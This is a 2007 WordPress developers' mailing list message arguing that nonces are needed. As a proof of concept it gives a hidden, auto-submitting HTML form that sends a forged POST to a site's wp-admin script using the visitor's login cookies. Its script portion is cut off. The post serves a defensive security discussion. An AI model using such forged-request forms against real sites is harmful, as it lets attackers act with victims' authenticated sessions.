[wp-hackers] Any other way to do it? (or, do we really need Nonces?)

Robert Deaton false.hopes at gmail.com
Sat Mar 3 15:59:07 GMT 2007

On 3/3/07, Elliotte Harold <elharo at metalab.unc.edu> wrote:
> However I would lie to see a specific proof of concept of a JavaScript
> that submits a POST to a 3rd party site with authentication cookies intact.

<form name="bar" target="foo" method="post"
action="http://yoursite/wp-admin/bad-script.php" style="display:none">
<input type="hidden" name="var1" value="value1"/>
<input type="hidden" name="var2" value="value2"/>
<input type="hidden" name="var3" value="value3"/>
<input type="submit" name="weneedthistosubmit"
<script type="text/javascript">

This particular incarnation is borrowed from earlier in the thread.
This one does work, however it will more likely than not trigger your
popup blockers. Test it and let it through, though, then remember that
all it takes is clicking a link and your popup blocker won't have a
thing to say.

The following are to help you test it. This sets a semi-random cookie.
This one var_dump()s $_POST and $_COOKIE

--Robert Deaton

More information about the wp-hackers mailing list